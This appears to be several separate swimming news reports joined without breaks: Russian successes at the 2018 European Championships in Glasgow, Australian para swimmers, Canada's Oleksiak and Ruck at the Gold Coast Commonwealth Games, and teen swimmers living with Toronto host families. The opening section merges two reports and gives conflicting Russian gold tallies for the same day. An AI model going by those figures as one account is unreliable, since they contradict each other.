Russia’s synchronized swimmers continued their country’s winning run at the European Championships in Glasgow, adding two more gold medals to the team’s tally. On Tuesday, Aleksandr Maltsev and Maya Gurbanberdieva won the duet free routine mixed final, posting a meet-high score of 92.400 points. They outscored their closest competitors, European silver medalists Manila Flamini and Giorgio Minisini of Italy, by 1.6 points. Bronze was taken by Spanish duet Berta Ferreras Sanz and Pau Ribes Culla. The mixed duet is a relatively new discipline which was introduced at the 2015 FINA World championships in Kazan, Russia. Also on Tuesday, Svetlana Kolesnichenko and Svetlana Subbotina claimed yet another gold in the duet free program, beating the second-placed Ukrainian couple Anastasiya Savchuk and Yelyzaveta Yakhno by a full three points. Italy’s Linda Cerruti and Costanza Ferro finished third. On Monday, 18-year-old Russian swimming sensation Kliment Kolesnikov added the 100m backstroke gold to his name, having earlier won the men’s 50m backstroke with a world record time. Kolesnikov was the fastest swimmer the cross the 100m distance, clocking a time of 52.53 seconds. Silver went to fellow Russian athlete Evgeny Rylov, who was 0.3 seconds behind Kolesnikov. After four competitive days at the multi-sport European Championships, Russia tops the medal standings with 17 gold medals, which is 10 more than the second-placed Italians, whose athletes have taken seven titles so far. Great Britain has the same number of golds but trails Italy by overall number of medals. Russia’s cyclists and synchronized swimmers have continued the nation’s impressive performances at the European Championships, with the country sitting firmly atop the medals table as of Monday afternoon. Russian synchronized swimmer Svetlana Kolesnichenko claimed victory in the technical solo event in Glasgow on Monday, bringing her country an 11th gold and 22nd medal in total at the event. READ MORE: 18yo Russian swimmer Kliment Kolesnikov breaks 50m backstroke world record Kolesnichenko’s flawlessly executed routine was merited a score of 93,4816 – a full two points ahead of the second-placed Ukrainian athlete Yelyzaveta Yakhno. Italy’s Linda Cerruti completed the podium with a result of 90,2282 points. So far Russia’s “mermaids” synchronized swimmers have taken gold in each event at the tournament apart from the combined free routine, which they opted to miss. READ MORE: Russian gymnasts, synchronized swimmers win more golds at European Championships On Sunday, Russian cyclists Darya Shmeleva and Anastasia Voynova finished first and second respectively in the women’s track sprint. The same day, five-time world champion Yulia Efimova took gold in the women’s 100m breaststroke event, ahead of 2012 Olympic champion Ruta Meilutyte of Lithuania, who settled for silver. After four days of competition Russia tops the European Championships medals table with 11 golds, six silvers and five bronze. Italy sits second with seven gold medals, while Great Britain rounds out the top three with six gold medals.

Aungles won the SM8 200m medley final in 2:30.77, holding off fast-finishing teammate Blake Cochrane as the Aussies claimed the medley quinella.
Patterson, who stepped up from the S8 classification to compete in the S9 100m freestyle, sliced almost a second from her best to overhaul pre-race favourite Ellie Cole and Englishwoman Alice Tai to win and win in a world record time of 1:03.02.
“I’ve got no words, I’m so excited,” Patterson said.
“It was definitely a challenge swimming up a classification.
“I spoke to my coach beforehand and he said: ‘At the end of the day, it is another swimming race. Don’t worry about anyone else and focus on yourself.’ “That is what I tried to do with these amazing girls next to me.
“I cannot thank my coach (Harley Connelly) highly enough and all of my family and friends that came to support me.
“It’s the first time my family have been able to watch me race at a major international competition.
“Hopefully I did them and Australia proud.”
Cole held the lead at the turn but Patterson stormed home to win gold, with Cole hanging on for bronze as both set new personal best times.
“It’s not often Australians get to see Paralympic sport, I think it is eye-opening for a lot of the Australian public,” Cole said.
“Hopefully some young kids with disabilities will see this and get in and give something a crack.”
GOLD COAST, Australia — For two swimmers with six Olympic medals between them, career firsts should be hard to come by. But when those swimmers are just 17 years old, there’s still plenty to experience and plenty to learn.
Thursday marked one of those rare new experiences for Canadians Penny Oleksiak and Taylor Ruck as they swam in their first-ever Commonwealth Games races.
And they have the medals to prove it.
Ruck, born in Kelowna, B.C., posted a Games-record time of one minute, 54.81 seconds on the way to a gold medal in the women’s 200-metre freestyle.
If that wasn’t enough of a unique experience, the new Commonwealth champion was also awarded her medal by Prince Charles.
In the final event of the evening, Ruck swam the anchor leg behind Torontonians Oleksiak and Kayla Sanchez and Montreal’s Alexia Zevnik to win silver in the 4×100 freestyle relay.
Para swimmer Sarah Mehain, of Vernon, B.C., rounded out the Canadian medal haul in the pool on Day 1 with a silver in the women’s S7 50m butterfly.
Both Ruck and Oleksiak are trying for medals every time they jump in the pool, but that’s not all they’re looking to gain in Australia. These Games are a measuring stick for the young swimmers, who are expected to lead the Canadian charge in the pool at the next Olympics, in Tokyo in 2020.
“[The Commonwealth Games are] just kind of a viewpoint of where I am right now going into the next Olympics,” Oleksiak said. “I’m not expecting to be at my next Olympic level right now, [I’ll] just see where I am, see what I can fix, and then build from there.”
One of those things she aims to improve is her recovery after races, and she acknowledges she still has work to do in other areas as well.
“I have a lot of things I can fix right now,” said Oleksiak, who finished seventh in the 200 race in which Ruck struck gold. “It’s kind of up from here.”
There are still lessons to be learned about how to cope at a major multi-sport competition, and Ruck agrees that the Gold Coast offers a refresher course of sorts.
“Having already been to Rio, there are many similarities between the two Games,” Ruck said. “Being able to transfer the skills and lessons that I learn here to Tokyo would be really helpful to my performances there.”
Oleksiak said the environment, while at times overwhelming, offers another opportunity to grow as a competitor.
“It’s pretty crazy because it’s literally athletes everywhere, but it kind of teaches me to be more professional in front of other people, and not always joking around all the time,” Oleksiak said before adding: “But I still like to have fun.”
Part of that fun is facing off against the Australians at these Games, who provide an extra bit of motivation for Oleksiak.
“All the [Australians] I’m racing, whether it’s Emma [McKeon], Cate [Campbell] or Bronte [Campbell] or any of them, they’re all amazingly fast girls,” Oleksiak said. “It’s a little bit intimidating because I know I’m never going to get a rest from them, but it’s fun because they’re always going to keep pushing me.”
The Australian 4×100 relay team, which won gold in a world-record time of 3:30.05, was seemingly energized by the feverish support of a home crowd.
An ocean of green and gold surrounded the outdoor venue as the host country’s fans — clad in team colours — were as loud as the crashing surf on the Gold Coast, cheering on an Australian squad that features sisters Cate and Bronte Campbell, Emma McKeon and Shayna Jack.
“Swimming in front of the Australians is amazing, an experience unlike I’ve ever had,” Ruck said. “When I was in the ready room I heard them cheering for the other Australian swimmers and I was like, oh my gosh, they were so loud and I’ve never heard that before. It was crazy.”
Ruck’s family is with her in Australia, helping the teenage phenom keep a semblance of normalcy. It also allows her at least one of the comforts of home — the traditional breakfast fixed by her dad on competition day.
“I don’t think my parents have ever been to such a large-scale meet, and having them here is just amazing. I got to see them yesterday and that was really cool,” she said. “My dad sometimes makes this thing called bennies, which is just like eggs benedict, but it’s special [to me].”
Family is on Oleksiak’s mind too as she swims with a heavy heart after finding out the day before competition that her grandmother had passed away.
Given the news one of my grandmothers died today breaks my heart. I feel extremely grateful knowing that she was able to live a long life having the ability to see her children and grandchildren succeed in various aspects of their lives. #whoidothisfor

There are five days of competition in the pool left to go, and both Oleksiak and Ruck will be podium favourites in more events, both individually and in relays.
Ruck said team competition is important to her.
“Just being able to be on the relay with my closest friends [makes it] super special because I’ve trained with them and shared so many experiences with them.”
There should be plenty more of those experiences still to come.

Something unusual is going on in Toronto’s east end.
Three of the best young swimmers in the world have quietly made their homes in the same little area within the Beach neighbourhood.
Penny Oleksiak, Taylor Ruck and Rebecca Smith are all living within a towel’s throw of one another. In fact, the three teens are now carpooling together to their daily workouts.
Olympic swimmer, coach and commentator Byron MacDonald described swimming’s new power pocket as “probably the highest concentration of world-class 17 year olds in any sport in one small radius!”
How did this happen? Swimming is big in Canada, but it’s not hockey big. Swimming doesn’t have the long-established arrangement that allows parents to safely send their 16 year olds off to play major junior hockey in distant cities.
The truth is, it’s happening in swimming now because old swimmers stick together. It’s happening informally. And it seems to be working fine.
John Grootveld swam alongside MacDonald in his day and was also a national coach. He’s now the director of business development for the Canadian Sports Institute Ontario, which is located at the Pan Am Sports Centre in Toronto – a national centre for elite swimming.
Nearby the Pan Am pool, Grootveld worked with West Hill Collegiate to start a program supporting high performance athletes.
Swimmers like Ruck and Oleksiak don’t need academic help, but timetable accommodation and teaching support for swimmers who are away competing or training? Crucial. And Grootveld is not one to leave his work at the office. He and his family share their home with Taylor Ruck, whose parents live in Arizona.
High performance swim coach Ben Titley came to Grootveld earlier this summer to see if he could squeeze the six-foot, 17-year-old Ruck into his home alongside his wife and their six and four year olds. It must be pretty cool for the little kids, who suddenly have a towering Olympian at their breakfast table.
“Well obviously they love it…She’s been wonderful with the kids,” Grootveld said. “For Taylor, she’s still pretty young, and you know she’s here, away from family so it’s a big step for her. But I think at the end of the day she knew that this is the best fit.”
There’s a reason why swimmers particularly need to find “away housing” for minors. Swimmers don’t necessarily peak young, but their window of high performance can open early.
Young athletes in other sports just don’t have the quads to lead a pursuit cycling team, or row hard, whereas swimming involves factors beyond sheer muscle. So you can still be very young and very good.
Taylor Ruck’s story is not so different from Rebecca Smith’s, who has been living in the exact same corner of the Beach for a year now. Smith caught coach Ben Titley’s eye as a rising star in 2016. Rebecca’s mother, Sandy, saw the benefit of intense training and her suggestion was: “if we could find a family with some kids, you know, we’d be interested in that.”
Titley put the neighborhood word out. It wasn’t exactly “Elite Swimmer: free to a good home!”, but still, the offer was there. Ron Watson and his wife, both former University of Toronto swimmers, and their two kids rose to the occasion.
“It’s funny in Canada, you have this group of young girls, only 16, 17, 18 years old, and they are super elite athletes in the world, which is kind of a blip,” Watson said. “I don’t think any other country really has this type of talent at that age level.”
So now, we have Rebecca Smith living just six or seven doors down from the Oleksiaks. Smith’s move from Red Deer, Alta., has been smooth for everyone involved.
“We are not proxy parents. Rebecca doesn’t need that,” Watson said. “She is mature beyond her years and she doesn’t need that parenting role.”
Smith, Oleksiak and Ruck all live close to the Summerville pool and there are a lot of kids in different swim clubs in the area. “When word got out that Taylor Ruck was moving in, there was a buzz of excitement,” Grootveld recalled.
Local kids also got a thrill from seeing Oleksiak in person. “Ben Titley had Penny bring her medals to the pools one day so the kids got to see that, which was cool,” Watson said. “And that’s the pool Penny trained at when she was younger. The Beaches have a lot of different athletes so nobody is surprised by it. No neighbourhood kids hanging around for autographs. Although Andrew, [Watson’s 11-year-old hockey playing son] got Penny’s brother Jamie’s NHL autograph.”
If it wasn’t for their massive workout load, it sounds like a sweet life for the three girls. They all live in the Beaches and they can hang out together when they want. Rebecca has a car so she kind of chauffeurs them.
Still, for all the parents involved, it’s no small thing, bringing these swimmers into their lives. And they certainly aren’t in it for the money.
“If they’re getting access to the facility, the top coaches, all of that? We’re in for that,” Watson said. “I think it’s great what they’re doing for Canada. These girls have a chance at winning medals at the Olympics.”
Remarkable as it is to have this concentrated cluster of talent. If Grootveld gets his way, the numbers could swell.
“I have two other friends that we used to swim with also living in the Beach. They are sitting in a holding pattern. When the call comes in, we should be able to move on a couple more swimmers after that…I might run out of friends in the Beach…”
